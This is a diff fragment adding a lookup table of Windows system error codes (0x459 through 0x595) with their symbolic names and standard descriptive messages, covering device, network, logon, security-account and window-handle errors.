+ 0x00000459: ("ERROR_NO_UNICODE_TRANSLATION", "No mapping for the Unicode character exists in the target multi-byte code page."),
+ 0x0000045a: ("ERROR_DLL_INIT_FAILED", "A dynamic link library (DLL) initialization routine failed."),
+ 0x0000045b: ("ERROR_SHUTDOWN_IN_PROGRESS", "A system shutdown is in progress."),
+ 0x0000045c: ("ERROR_NO_SHUTDOWN_IN_PROGRESS", "Unable to abort the system shutdown because no shutdown was in progress."),
+ 0x0000045d: ("ERROR_IO_DEVICE", "The request could not be performed because of an I/O device error."),
+ 0x0000045e: ("ERROR_SERIAL_NO_DEVICE", "No serial device was successfully initialized. The serial driver will unload."),
+ 0x0000045f: ("ERROR_IRQ_BUSY", "Unable to open a device that was sharing an interrupt request (IRQ) with other devices. At least one other device that uses that IRQ was already opened."),
+ 0x00000460: ("ERROR_MORE_WRITES", "A serial I/O operation was completed by another write to the serial port."),
+ 0x00000461: ("ERROR_COUNTER_TIMEOUT", "A serial I/O operation completed because the timeout period expired."),
+ 0x00000462: ("ERROR_FLOPPY_ID_MARK_NOT_FOUND", "No ID address mark was found on the floppy disk."),
+ 0x00000463: ("ERROR_FLOPPY_WRONG_CYLINDER", "Mismatch between the floppy disk sector ID field and the floppy disk controller track address."),
+ 0x00000464: ("ERROR_FLOPPY_UNKNOWN_ERROR", "The floppy disk controller reported an error that is not recognized by the floppy disk driver."),
+ 0x00000465: ("ERROR_FLOPPY_BAD_REGISTERS", "The floppy disk controller returned inconsistent results in its registers."),
+ 0x00000466: ("ERROR_DISK_RECALIBRATE_FAILED", "While accessing the hard disk, a recalibrate operation failed, even after retries."),
+ 0x00000467: ("ERROR_DISK_OPERATION_FAILED", "While accessing the hard disk, a disk operation failed even after retries."),
+ 0x00000468: ("ERROR_DISK_RESET_FAILED", "While accessing the hard disk, a disk controller reset was needed, but even that failed."),
+ 0x00000469: ("ERROR_EOM_OVERFLOW", "Physical end of tape encountered."),
+ 0x0000046a: ("ERROR_NOT_ENOUGH_SERVER_MEMORY", "Not enough server storage is available to process this command."),
+ 0x0000046b: ("ERROR_POSSIBLE_DEADLOCK", "A potential deadlock condition has been detected."),
+ 0x0000046c: ("ERROR_MAPPED_ALIGNMENT", "The base address or the file offset specified does not have the proper alignment."),
+ 0x00000474: ("ERROR_SET_POWER_STATE_VETOED", "An attempt to change the system power state was vetoed by another application or driver."),
+ 0x00000475: ("ERROR_SET_POWER_STATE_FAILED", "The system BIOS failed an attempt to change the system power state."),
+ 0x00000476: ("ERROR_TOO_MANY_LINKS", "An attempt was made to create more links on a file than the file system supports."),
+ 0x0000047e: ("ERROR_OLD_WIN_VERSION", "The specified program requires a newer version of Windows."),
+ 0x0000047f: ("ERROR_APP_WRONG_OS", "The specified program is not a Windows or MS-DOS program."),
+ 0x00000480: ("ERROR_SINGLE_INSTANCE_APP", "Cannot start more than one instance of the specified program."),
+ 0x00000481: ("ERROR_RMODE_APP", "The specified program was written for an earlier version of Windows."),
+ 0x00000482: ("ERROR_INVALID_DLL", "One of the library files needed to run this application is damaged."),
+ 0x00000483: ("ERROR_NO_ASSOCIATION", "No application is associated with the specified file for this operation."),
+ 0x00000484: ("ERROR_DDE_FAIL", "An error occurred in sending the command to the application."),
+ 0x00000485: ("ERROR_DLL_NOT_FOUND", "One of the library files needed to run this application cannot be found."),
+ 0x00000486: ("ERROR_NO_MORE_USER_HANDLES", "The current process has used all of its system allowance of handles for Window Manager objects."),
+ 0x00000487: ("ERROR_MESSAGE_SYNC_ONLY", "The message can be used only with synchronous operations."),
+ 0x00000488: ("ERROR_SOURCE_ELEMENT_EMPTY", "The indicated source element has no media."),
+ 0x00000489: ("ERROR_DESTINATION_ELEMENT_FULL", "The indicated destination element already contains media."),
+ 0x0000048a: ("ERROR_ILLEGAL_ELEMENT_ADDRESS", "The indicated element does not exist."),
+ 0x0000048b: ("ERROR_MAGAZINE_NOT_PRESENT", "The indicated element is part of a magazine that is not present."),
+ 0x0000048c: ("ERROR_DEVICE_REINITIALIZATION_NEEDED", "The indicated device requires reinitialization due to hardware errors."),
+ 0x0000048d: ("ERROR_DEVICE_REQUIRES_CLEANING", "The device has indicated that cleaning is required before further operations are attempted."),
+ 0x0000048e: ("ERROR_DEVICE_DOOR_OPEN", "The device has indicated that its door is open."),
+ 0x0000048f: ("ERROR_DEVICE_NOT_CONNECTED", "The device is not connected."),
+ 0x00000490: ("ERROR_NOT_FOUND", "Element not found."),
+ 0x00000491: ("ERROR_NO_MATCH", "There was no match for the specified key in the index."),
+ 0x00000492: ("ERROR_SET_NOT_FOUND", "The property set specified does not exist on the object."),
+ 0x00000493: ("ERROR_POINT_NOT_FOUND", "The point passed to GetMouseMovePoints is not in the buffer."),
+ 0x00000494: ("ERROR_NO_TRACKING_SERVICE", "The tracking (workstation) service is not running."),
+ 0x00000495: ("ERROR_NO_VOLUME_ID", "The Volume ID could not be found."),
+ 0x00000497: ("ERROR_UNABLE_TO_REMOVE_REPLACED", "Unable to remove the file to be replaced."),
+ 0x00000498: ("ERROR_UNABLE_TO_MOVE_REPLACEMENT", "Unable to move the replacement file to the file to be replaced. The file to be replaced has retained its original name."),
+ 0x00000499: ("ERROR_UNABLE_TO_MOVE_REPLACEMENT_2", "Unable to move the replacement file to the file to be replaced. The file to be replaced has been renamed using the backup name."),
+ 0x0000049a: ("ERROR_JOURNAL_DELETE_IN_PROGRESS", "The volume change journal is being deleted."),
+ 0x0000049b: ("ERROR_JOURNAL_NOT_ACTIVE", "The volume change journal is not active."),
+ 0x0000049c: ("ERROR_POTENTIAL_FILE_FOUND", "A file was found, but it may not be the correct file."),
+ 0x0000049d: ("ERROR_JOURNAL_ENTRY_DELETED", "The journal entry has been deleted from the journal."),
+ 0x000004a6: ("ERROR_SHUTDOWN_IS_SCHEDULED", "A system shutdown has already been scheduled."),
+ 0x000004a7: ("ERROR_SHUTDOWN_USERS_LOGGED_ON", "The system shutdown cannot be initiated because there are other users logged on to the computer."),
+ 0x000004b0: ("ERROR_BAD_DEVICE", "The specified device name is invalid."),
+ 0x000004b1: ("ERROR_CONNECTION_UNAVAIL", "The device is not currently connected but it is a remembered connection."),
+ 0x000004b2: ("ERROR_DEVICE_ALREADY_REMEMBERED", "The local device name has a remembered connection to another network resource."),
+ 0x000004b3: ("ERROR_NO_NET_OR_BAD_PATH", "The network path was either typed incorrectly, does not exist, or the network provider is not currently available. Please try retyping the path or contact your network administrator."),
+ 0x000004b4: ("ERROR_BAD_PROVIDER", "The specified network provider name is invalid."),
+ 0x000004b5: ("ERROR_CANNOT_OPEN_PROFILE", "Unable to open the network connection profile."),
+ 0x000004b6: ("ERROR_BAD_PROFILE", "The network connection profile is corrupted."),
+ 0x000004b7: ("ERROR_NOT_CONTAINER", "Cannot enumerate a noncontainer."),
+ 0x000004b8: ("ERROR_EXTENDED_ERROR", "An extended error has occurred."),
+ 0x000004b9: ("ERROR_INVALID_GROUPNAME", "The format of the specified group name is invalid."),
+ 0x000004ba: ("ERROR_INVALID_COMPUTERNAME", "The format of the specified computer name is invalid."),
+ 0x000004bb: ("ERROR_INVALID_EVENTNAME", "The format of the specified event name is invalid."),
+ 0x000004bc: ("ERROR_INVALID_DOMAINNAME", "The format of the specified domain name is invalid."),
+ 0x000004bd: ("ERROR_INVALID_SERVICENAME", "The format of the specified service name is invalid."),
+ 0x000004be: ("ERROR_INVALID_NETNAME", "The format of the specified network name is invalid."),
+ 0x000004bf: ("ERROR_INVALID_SHARENAME", "The format of the specified share name is invalid."),
+ 0x000004c0: ("ERROR_INVALID_PASSWORDNAME", "The format of the specified password is invalid."),
+ 0x000004c1: ("ERROR_INVALID_MESSAGENAME", "The format of the specified message name is invalid."),
+ 0x000004c2: ("ERROR_INVALID_MESSAGEDEST", "The format of the specified message destination is invalid."),
+ 0x000004c3: ("ERROR_SESSION_CREDENTIAL_CONFLICT", "Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again."),
+ 0x000004c4: ("ERROR_REMOTE_SESSION_LIMIT_EXCEEDED", "An attempt was made to establish a session to a network server, but there are already too many sessions established to that server."),
+ 0x000004c5: ("ERROR_DUP_DOMAINNAME", "The workgroup or domain name is already in use by another computer on the network."),
+ 0x000004c6: ("ERROR_NO_NETWORK", "The network is not present or not started."),
+ 0x000004c7: ("ERROR_CANCELLED", "The operation was canceled by the user."),
+ 0x000004c8: ("ERROR_USER_MAPPED_FILE", "The requested operation cannot be performed on a file with a user-mapped section open."),
+ 0x000004c9: ("ERROR_CONNECTION_REFUSED", "The remote computer refused the network connection."),
+ 0x000004ca: ("ERROR_GRACEFUL_DISCONNECT", "The network connection was gracefully closed."),
+ 0x000004cb: ("ERROR_ADDRESS_ALREADY_ASSOCIATED", "The network transport endpoint already has an address associated with it."),
+ 0x000004cc: ("ERROR_ADDRESS_NOT_ASSOCIATED", "An address has not yet been associated with the network endpoint."),
+ 0x000004cd: ("ERROR_CONNECTION_INVALID", "An operation was attempted on a nonexistent network connection."),
+ 0x000004ce: ("ERROR_CONNECTION_ACTIVE", "An invalid operation was attempted on an active network connection."),
+ 0x000004cf: ("ERROR_NETWORK_UNREACHABLE", "The network location cannot be reached. For information about network troubleshooting, see Windows Help."),
+ 0x000004d0: ("ERROR_HOST_UNREACHABLE", "The network location cannot be reached. For information about network troubleshooting, see Windows Help."),
+ 0x000004d1: ("ERROR_PROTOCOL_UNREACHABLE", "The network location cannot be reached. For information about network troubleshooting, see Windows Help."),
+ 0x000004d2: ("ERROR_PORT_UNREACHABLE", "No service is operating at the destination network endpoint on the remote system."),
+ 0x000004d3: ("ERROR_REQUEST_ABORTED", "The request was aborted."),
+ 0x000004d4: ("ERROR_CONNECTION_ABORTED", "The network connection was aborted by the local system."),
+ 0x000004d5: ("ERROR_RETRY", "The operation could not be completed. A retry should be performed."),
+ 0x000004d6: ("ERROR_CONNECTION_COUNT_LIMIT", "A connection to the server could not be made because the limit on the number of concurrent connections for this account has been reached."),
+ 0x000004d7: ("ERROR_LOGIN_TIME_RESTRICTION", "Attempting to log in during an unauthorized time of day for this account."),
+ 0x000004d8: ("ERROR_LOGIN_WKSTA_RESTRICTION", "The account is not authorized to log in from this station."),
+ 0x000004d9: ("ERROR_INCORRECT_ADDRESS", "The network address could not be used for the operation requested."),
+ 0x000004da: ("ERROR_ALREADY_REGISTERED", "The service is already registered."),
+ 0x000004db: ("ERROR_SERVICE_NOT_FOUND", "The specified service does not exist."),
+ 0x000004dc: ("ERROR_NOT_AUTHENTICATED", "The operation being requested was not performed because the user has not been authenticated."),
+ 0x000004dd: ("ERROR_NOT_LOGGED_ON", "The operation being requested was not performed because the user has not logged on to the network. The specified service does not exist."),
+ 0x000004de: ("ERROR_CONTINUE", "Continue with work in progress."),
+ 0x000004df: ("ERROR_ALREADY_INITIALIZED", "An attempt was made to perform an initialization operation when initialization has already been completed."),
+ 0x000004e0: ("ERROR_NO_MORE_DEVICES", "No more local devices."),
+ 0x000004e1: ("ERROR_NO_SUCH_SITE", "The specified site does not exist."),
+ 0x000004e2: ("ERROR_DOMAIN_CONTROLLER_EXISTS", "A domain controller with the specified name already exists."),
+ 0x000004e3: ("ERROR_ONLY_IF_CONNECTED", "This operation is supported only when you are connected to the server."),
+ 0x000004e4: ("ERROR_OVERRIDE_NOCHANGES", "The group policy framework should call the extension even if there are no changes."),
+ 0x000004e5: ("ERROR_BAD_USER_PROFILE", "The specified user does not have a valid profile."),
+ 0x000004e6: ("ERROR_NOT_SUPPORTED_ON_SBS", "This operation is not supported on a computer running Windows Server 2003 for Small Business Server"),
+ 0x000004e7: ("ERROR_SERVER_SHUTDOWN_IN_PROGRESS", "The server machine is shutting down."),
+ 0x000004e8: ("ERROR_HOST_DOWN", "The remote system is not available. For information about network troubleshooting, see Windows Help."),
+ 0x000004e9: ("ERROR_NON_ACCOUNT_SID", "The security identifier provided is not from an account domain."),
+ 0x000004ea: ("ERROR_NON_DOMAIN_SID", "The security identifier provided does not have a domain component."),
+ 0x000004eb: ("ERROR_APPHELP_BLOCK", "AppHelp dialog canceled thus preventing the application from starting."),
+ 0x000004ec: ("ERROR_ACCESS_DISABLED_BY_POLICY", "This program is blocked by group policy. For more information, contact your system administrator."),
+ 0x000004ed: ("ERROR_REG_NAT_CONSUMPTION", "A program attempt to use an invalid register value. Normally caused by an uninitialized register. This error is Itanium specific."),
+ 0x000004ee: ("ERROR_CSCSHARE_OFFLINE", "The share is currently offline or does not exist."),
+ 0x000004ef: ("ERROR_PKINIT_FAILURE", "The Kerberos protocol encountered an error while validating the KDC certificate during smartcard logon. There is more information in the system event log."),
+ 0x000004f0: ("ERROR_SMARTCARD_SUBSYSTEM_FAILURE", "The Kerberos protocol encountered an error while attempting to utilize the smartcard subsystem."),
+ 0x000004f1: ("ERROR_DOWNGRADE_DETECTED", "The system cannot contact a domain controller to service the authentication request. Please try again later."),
+ 0x000004f7: ("ERROR_MACHINE_LOCKED", "The machine is locked and cannot be shut down without the force option."),
+ 0x000004f9: ("ERROR_CALLBACK_SUPPLIED_INVALID_DATA", "An application-defined callback gave invalid data when called."),
+ 0x000004fa: ("ERROR_SYNC_FOREGROUND_REFRESH_REQUIRED", "The group policy framework should call the extension in the synchronous foreground policy refresh."),
+ 0x000004fb: ("ERROR_DRIVER_BLOCKED", "This driver has been blocked from loading"),
+ 0x000004fc: ("ERROR_INVALID_IMPORT_OF_NON_DLL", "A dynamic link library (DLL) referenced a module that was neither a DLL nor the process's executable image."),
+ 0x000004fd: ("ERROR_ACCESS_DISABLED_WEBBLADE", "Windows cannot open this program since it has been disabled."),
+ 0x000004fe: ("ERROR_ACCESS_DISABLED_WEBBLADE_TAMPER", "Windows cannot open this program because the license enforcement system has been tampered with or become corrupted."),
+ 0x000004ff: ("ERROR_RECOVERY_FAILURE", "A transaction recover failed."),
+ 0x00000500: ("ERROR_ALREADY_FIBER", "The current thread has already been converted to a fiber."),
+ 0x00000501: ("ERROR_ALREADY_THREAD", "The current thread has already been converted from a fiber."),
+ 0x00000502: ("ERROR_STACK_BUFFER_OVERRUN", "The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application."),
+ 0x00000503: ("ERROR_PARAMETER_QUOTA_EXCEEDED", "Data present in one of the parameters is more than the function can operate on."),
+ 0x00000504: ("ERROR_DEBUGGER_INACTIVE", "An attempt to do an operation on a debug object failed because the object is in the process of being deleted."),
+ 0x00000505: ("ERROR_DELAY_LOAD_FAILED", "An attempt to delay-load a .dll or get a function address in a delay-loaded .dll failed."),
+ 0x00000506: ("ERROR_VDM_DISALLOWED", "%1 is a 16-bit application. You do not have permissions to execute 16-bit applications. Check your permissions with your system administrator."),
+ 0x00000507: ("ERROR_UNIDENTIFIED_ERROR", "Insufficient information exists to identify the cause of failure."),
+ 0x00000508: ("ERROR_INVALID_CRUNTIME_PARAMETER", "The parameter passed to a C runtime function is incorrect."),
+ 0x00000509: ("ERROR_BEYOND_VDL", "The operation occurred beyond the valid data length of the file."),
+ 0x0000050a: ("ERROR_INCOMPATIBLE_SERVICE_SID_TYPE", "The service start failed since one or more services in the same process have an incompatible service SID type setting. A service with restricted service SID type can only coexist in the same process with other services with a restricted SID type. If the service SID type for this service was just configured, the hosting process must be restarted in order to start this service."),
+ 0x0000050b: ("ERROR_DRIVER_PROCESS_TERMINATED", "The process hosting the driver for this device has been terminated."),
+ 0x0000050c: ("ERROR_IMPLEMENTATION_LIMIT", "An operation attempted to exceed an implementation-defined limit."),
+ 0x0000050d: ("ERROR_PROCESS_IS_PROTECTED", "Either the target process, or the target thread's containing process, is a protected process."),
+ 0x0000050e: ("ERROR_SERVICE_NOTIFY_CLIENT_LAGGING", "The service notification client is lagging too far behind the current state of services in the machine."),
+ 0x0000050f: ("ERROR_DISK_QUOTA_EXCEEDED", "The requested file operation failed because the storage quota was exceeded."),
+ 0x00000510: ("ERROR_CONTENT_BLOCKED", "The requested file operation failed because the storage policy blocks that type of file. For more information, contact your system administrator."),
+ 0x00000511: ("ERROR_INCOMPATIBLE_SERVICE_PRIVILEGE", "A privilege that the service requires to function properly does not exist in the service account configuration."),
+ 0x00000512: ("ERROR_APP_HANG", "A thread involved in this operation appears to be unresponsive."),
+ 0x00000513: ("ERROR_INVALID_LABEL", "Indicates a particular Security ID may not be assigned as the label of an object."),
+ 0x00000514: ("ERROR_NOT_ALL_ASSIGNED", "Not all privileges or groups referenced are assigned to the caller."),
+ 0x00000515: ("ERROR_SOME_NOT_MAPPED", "Some mapping between account names and security IDs was not done."),
+ 0x00000516: ("ERROR_NO_QUOTAS_FOR_ACCOUNT", "No system quota limits are specifically set for this account."),
+ 0x00000517: ("ERROR_LOCAL_USER_SESSION_KEY", "No encryption key is available. A well-known encryption key was returned."),
+ 0x00000518: ("ERROR_NULL_LM_PASSWORD", "The password is too complex to be converted to a LAN Manager password. The LAN Manager password returned is a NULL string."),
+ 0x00000519: ("ERROR_UNKNOWN_REVISION", "The revision level is unknown."),
+ 0x0000051a: ("ERROR_REVISION_MISMATCH", "Indicates two revision levels are incompatible."),
+ 0x0000051b: ("ERROR_INVALID_OWNER", "This security ID may not be assigned as the owner of this object."),
+ 0x0000051c: ("ERROR_INVALID_PRIMARY_GROUP", "This security ID may not be assigned as the primary group of an object."),
+ 0x0000051d: ("ERROR_NO_IMPERSONATION_TOKEN", "An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client."),
+ 0x0000051e: ("ERROR_CANT_DISABLE_MANDATORY", "The group may not be disabled."),
+ 0x0000051f: ("ERROR_NO_LOGON_SERVERS", "There are currently no logon servers available to service the logon request."),
+ 0x00000520: ("ERROR_NO_SUCH_LOGON_SESSION", "A specified logon session does not exist. It may already have been terminated."),
+ 0x00000521: ("ERROR_NO_SUCH_PRIVILEGE", "A specified privilege does not exist."),
+ 0x00000522: ("ERROR_PRIVILEGE_NOT_HELD", "A required privilege is not held by the client."),
+ 0x00000523: ("ERROR_INVALID_ACCOUNT_NAME", "The name provided is not a properly formed account name."),
+ 0x00000524: ("ERROR_USER_EXISTS", "The specified account already exists."),
+ 0x00000525: ("ERROR_NO_SUCH_USER", "The specified account does not exist."),
+ 0x00000526: ("ERROR_GROUP_EXISTS", "The specified group already exists."),
+ 0x00000527: ("ERROR_NO_SUCH_GROUP", "The specified group does not exist."),
+ 0x00000528: ("ERROR_MEMBER_IN_GROUP", "Either the specified user account is already a member of the specified group, or the specified group cannot be deleted because it contains a member."),
+ 0x00000529: ("ERROR_MEMBER_NOT_IN_GROUP", "The specified user account is not a member of the specified group account."),
+ 0x0000052a: ("ERROR_LAST_ADMIN", "This operation is disallowed as it could result in an administration account being disabled, deleted or unable to logon."),
+ 0x0000052b: ("ERROR_WRONG_PASSWORD", "Unable to update the password. The value provided as the current password is incorrect."),
+ 0x0000052c: ("ERROR_ILL_FORMED_PASSWORD", "Unable to update the password. The value provided for the new password contains values that are not allowed in passwords."),
+ 0x0000052d: ("ERROR_PASSWORD_RESTRICTION", "Unable to update the password. The value provided for the new password does not meet the length, complexity, or history requirements of the domain."),
+ 0x0000052e: ("ERROR_LOGON_FAILURE", "The user name or password is incorrect."),
+ 0x0000052f: ("ERROR_ACCOUNT_RESTRICTION", "Account restrictions are preventing this user from signing in. For example: blank passwords aren't allowed, sign-in times are limited, or a policy restriction has been enforced."),
+ 0x00000530: ("ERROR_INVALID_LOGON_HOURS", "Your account has time restrictions that keep you from signing in right now."),
+ 0x00000531: ("ERROR_INVALID_WORKSTATION", "This user isn't allowed to sign in to this computer."),
+ 0x00000532: ("ERROR_PASSWORD_EXPIRED", "The password for this account has expired."),
+ 0x00000533: ("ERROR_ACCOUNT_DISABLED", "This user can't sign in because this account is currently disabled."),
+ 0x00000534: ("ERROR_NONE_MAPPED", "No mapping between account names and security IDs was done."),
+ 0x00000535: ("ERROR_TOO_MANY_LUIDS_REQUESTED", "Too many local user identifiers (LUIDs) were requested at one time."),
+ 0x00000536: ("ERROR_LUIDS_EXHAUSTED", "No more local user identifiers (LUIDs) are available."),
+ 0x00000537: ("ERROR_INVALID_SUB_AUTHORITY", "The subauthority part of a security ID is invalid for this particular use."),
+ 0x00000538: ("ERROR_INVALID_ACL", "The access control list (ACL) structure is invalid."),
+ 0x00000539: ("ERROR_INVALID_SID", "The security ID structure is invalid."),
+ 0x0000053a: ("ERROR_INVALID_SECURITY_DESCR", "The security descriptor structure is invalid."),
+ 0x0000053c: ("ERROR_BAD_INHERITANCE_ACL", "The inherited access control list (ACL) or access control entry (ACE) could not be built."),
+ 0x0000053d: ("ERROR_SERVER_DISABLED", "The server is currently disabled."),
+ 0x0000053e: ("ERROR_SERVER_NOT_DISABLED", "The server is currently enabled."),
+ 0x0000053f: ("ERROR_INVALID_ID_AUTHORITY", "The value provided was an invalid value for an identifier authority."),
+ 0x00000540: ("ERROR_ALLOTTED_SPACE_EXCEEDED", "No more memory is available for security information updates."),
+ 0x00000541: ("ERROR_INVALID_GROUP_ATTRIBUTES", "The specified attributes are invalid, or incompatible with the attributes for the group as a whole."),
+ 0x00000542: ("ERROR_BAD_IMPERSONATION_LEVEL", "Either a required impersonation level was not provided, or the provided impersonation level is invalid."),
+ 0x00000543: ("ERROR_CANT_OPEN_ANONYMOUS", "Cannot open an anonymous level security token."),
+ 0x00000544: ("ERROR_BAD_VALIDATION_CLASS", "The validation information class requested was invalid."),
+ 0x00000545: ("ERROR_BAD_TOKEN_TYPE", "The type of the token is inappropriate for its attempted use."),
+ 0x00000546: ("ERROR_NO_SECURITY_ON_OBJECT", "Unable to perform a security operation on an object that has no associated security."),
+ 0x00000547: ("ERROR_CANT_ACCESS_DOMAIN_INFO", "Configuration information could not be read from the domain controller, either because the machine is unavailable, or access has been denied."),
+ 0x00000548: ("ERROR_INVALID_SERVER_STATE", "The security account manager (SAM) or local security authority (LSA) server was in the wrong state to perform the security operation."),
+ 0x00000549: ("ERROR_INVALID_DOMAIN_STATE", "The domain was in the wrong state to perform the security operation."),
+ 0x0000054a: ("ERROR_INVALID_DOMAIN_ROLE", "This operation is only allowed for the Primary Domain Controller of the domain."),
+ 0x0000054b: ("ERROR_NO_SUCH_DOMAIN", "The specified domain either does not exist or could not be contacted."),
+ 0x0000054c: ("ERROR_DOMAIN_EXISTS", "The specified domain already exists."),
+ 0x0000054d: ("ERROR_DOMAIN_LIMIT_EXCEEDED", "An attempt was made to exceed the limit on the number of domains per server."),
+ 0x0000054e: ("ERROR_INTERNAL_DB_CORRUPTION", "Unable to complete the requested operation because of either a catastrophic media failure or a data structure corruption on the disk."),
+ 0x0000054f: ("ERROR_INTERNAL_ERROR", "An internal error occurred."),
+ 0x00000550: ("ERROR_GENERIC_NOT_MAPPED", "Generic access types were contained in an access mask which should already be mapped to nongeneric types."),
+ 0x00000551: ("ERROR_BAD_DESCRIPTOR_FORMAT", "A security descriptor is not in the right format (absolute or self-relative)."),
+ 0x00000552: ("ERROR_NOT_LOGON_PROCESS", "The requested action is restricted for use by logon processes only. The calling process has not registered as a logon process."),
+ 0x00000553: ("ERROR_LOGON_SESSION_EXISTS", "Cannot start a new logon session with an ID that is already in use."),
+ 0x00000554: ("ERROR_NO_SUCH_PACKAGE", "A specified authentication package is unknown."),
+ 0x00000555: ("ERROR_BAD_LOGON_SESSION_STATE", "The logon session is not in a state that is consistent with the requested operation."),
+ 0x00000556: ("ERROR_LOGON_SESSION_COLLISION", "The logon session ID is already in use."),
+ 0x00000557: ("ERROR_INVALID_LOGON_TYPE", "A logon request contained an invalid logon type value."),
+ 0x00000558: ("ERROR_CANNOT_IMPERSONATE", "Unable to impersonate using a named pipe until data has been read from that pipe."),
+ 0x00000559: ("ERROR_RXACT_INVALID_STATE", "The transaction state of a registry subtree is incompatible with the requested operation."),
+ 0x0000055a: ("ERROR_RXACT_COMMIT_FAILURE", "An internal security database corruption has been encountered."),
+ 0x0000055b: ("ERROR_SPECIAL_ACCOUNT", "Cannot perform this operation on built-in accounts."),
+ 0x0000055c: ("ERROR_SPECIAL_GROUP", "Cannot perform this operation on this built-in special group."),
+ 0x0000055d: ("ERROR_SPECIAL_USER", "Cannot perform this operation on this built-in special user."),
+ 0x0000055e: ("ERROR_MEMBERS_PRIMARY_GROUP", "The user cannot be removed from a group because the group is currently the user's primary group."),
+ 0x0000055f: ("ERROR_TOKEN_ALREADY_IN_USE", "The token is already in use as a primary token."),
+ 0x00000560: ("ERROR_NO_SUCH_ALIAS", "The specified local group does not exist."),
+ 0x00000561: ("ERROR_MEMBER_NOT_IN_ALIAS", "The specified account name is not a member of the group."),
+ 0x00000562: ("ERROR_MEMBER_IN_ALIAS", "The specified account name is already a member of the group."),
+ 0x00000563: ("ERROR_ALIAS_EXISTS", "The specified local group already exists."),
+ 0x00000564: ("ERROR_LOGON_NOT_GRANTED", "Logon failure: the user has not been granted the requested logon type at this computer."),
+ 0x00000565: ("ERROR_TOO_MANY_SECRETS", "The maximum number of secrets that may be stored in a single system has been exceeded."),
+ 0x00000566: ("ERROR_SECRET_TOO_LONG", "The length of a secret exceeds the maximum length allowed."),
+ 0x00000567: ("ERROR_INTERNAL_DB_ERROR", "The local security authority database contains an internal inconsistency."),
+ 0x00000568: ("ERROR_TOO_MANY_CONTEXT_IDS", "During a logon attempt, the user's security context accumulated too many security IDs."),
+ 0x00000569: ("ERROR_LOGON_TYPE_NOT_GRANTED", "Logon failure: the user has not been granted the requested logon type at this computer."),
+ 0x0000056a: ("ERROR_NT_CROSS_ENCRYPTION_REQUIRED", "A cross-encrypted password is necessary to change a user password."),
+ 0x0000056b: ("ERROR_NO_SUCH_MEMBER", "A member could not be added to or removed from the local group because the member does not exist."),
+ 0x0000056c: ("ERROR_INVALID_MEMBER", "A new member could not be added to a local group because the member has the wrong account type."),
+ 0x0000056d: ("ERROR_TOO_MANY_SIDS", "Too many security IDs have been specified."),
+ 0x0000056e: ("ERROR_LM_CROSS_ENCRYPTION_REQUIRED", "A cross-encrypted password is necessary to change this user password."),
+ 0x0000056f: ("ERROR_NO_INHERITANCE", "Indicates an ACL contains no inheritable components."),
+ 0x00000570: ("ERROR_FILE_CORRUPT", "The file or directory is corrupted and unreadable."),
+ 0x00000571: ("ERROR_DISK_CORRUPT", "The disk structure is corrupted and unreadable."),
+ 0x00000572: ("ERROR_NO_USER_SESSION_KEY", "There is no user session key for the specified logon session."),
+ 0x00000573: ("ERROR_LICENSE_QUOTA_EXCEEDED", "The service being accessed is licensed for a particular number of connections. No more connections can be made to the service at this time because there are already as many connections as the service can accept."),
+ 0x00000574: ("ERROR_WRONG_TARGET_NAME", "The target account name is incorrect."),
+ 0x00000575: ("ERROR_MUTUAL_AUTH_FAILED", "Mutual Authentication failed. The server's password is out of date at the domain controller."),
+ 0x00000576: ("ERROR_TIME_SKEW", "There is a time and/or date difference between the client and server."),
+ 0x00000577: ("ERROR_CURRENT_DOMAIN_NOT_ALLOWED", "This operation cannot be performed on the current domain."),
+ 0x00000578: ("ERROR_INVALID_WINDOW_HANDLE", "Invalid window handle."),
+ 0x00000579: ("ERROR_INVALID_MENU_HANDLE", "Invalid menu handle."),
+ 0x0000057a: ("ERROR_INVALID_CURSOR_HANDLE", "Invalid cursor handle."),
+ 0x0000057b: ("ERROR_INVALID_ACCEL_HANDLE", "Invalid accelerator table handle."),
+ 0x0000057c: ("ERROR_INVALID_HOOK_HANDLE", "Invalid hook handle."),
+ 0x0000057d: ("ERROR_INVALID_DWP_HANDLE", "Invalid handle to a multiple-window position structure."),
+ 0x0000057e: ("ERROR_TLW_WITH_WSCHILD", "Cannot create a top-level child window."),
+ 0x0000057f: ("ERROR_CANNOT_FIND_WND_CLASS", "Cannot find window class."),
+ 0x00000580: ("ERROR_WINDOW_OF_OTHER_THREAD", "Invalid window; it belongs to other thread."),
+ 0x00000581: ("ERROR_HOTKEY_ALREADY_REGISTERED", "Hot key is already registered."),
+ 0x00000582: ("ERROR_CLASS_ALREADY_EXISTS", "Class already exists."),
+ 0x00000583: ("ERROR_CLASS_DOES_NOT_EXIST", "Class does not exist."),
+ 0x00000584: ("ERROR_CLASS_HAS_WINDOWS", "Class still has open windows."),
+ 0x00000585: ("ERROR_INVALID_INDEX", "Invalid index."),
+ 0x00000586: ("ERROR_INVALID_ICON_HANDLE", "Invalid icon handle."),
+ 0x00000587: ("ERROR_PRIVATE_DIALOG_INDEX", "Using private DIALOG window words."),
+ 0x00000588: ("ERROR_LISTBOX_ID_NOT_FOUND", "The list box identifier was not found."),
+ 0x00000589: ("ERROR_NO_WILDCARD_CHARACTERS", "No wildcards were found."),
+ 0x0000058a: ("ERROR_CLIPBOARD_NOT_OPEN", "Thread does not have a clipboard open."),
+ 0x0000058b: ("ERROR_HOTKEY_NOT_REGISTERED", "Hot key is not registered."),
+ 0x0000058c: ("ERROR_WINDOW_NOT_DIALOG", "The window is not a valid dialog window."),
+ 0x0000058d: ("ERROR_CONTROL_ID_NOT_FOUND", "Control ID not found."),
+ 0x0000058e: ("ERROR_INVALID_COMBOBOX_MESSAGE", "Invalid message for a combo box because it does not have an edit control."),
+ 0x0000058f: ("ERROR_WINDOW_NOT_COMBOBOX", "The window is not a combo box."),
+ 0x00000590: ("ERROR_INVALID_EDIT_HEIGHT", "Height must be less than 256."),
+ 0x00000591: ("ERROR_DC_NOT_FOUND", "Invalid device context (DC) handle."),
+ 0x00000592: ("ERROR_INVALID_HOOK_FILTER", "Invalid hook procedure type."),
+ 0x00000593: ("ERROR_INVALID_FILTER_PROC", "Invalid hook procedure."),
+ 0x00000594: ("ERROR_HOOK_NEEDS_HMOD", "Cannot set nonlocal hook without a module handle."),
+ 0x00000595: ("ERROR_GLOBAL_ONLY_HOOK", "This hook procedure can only be set globally."),
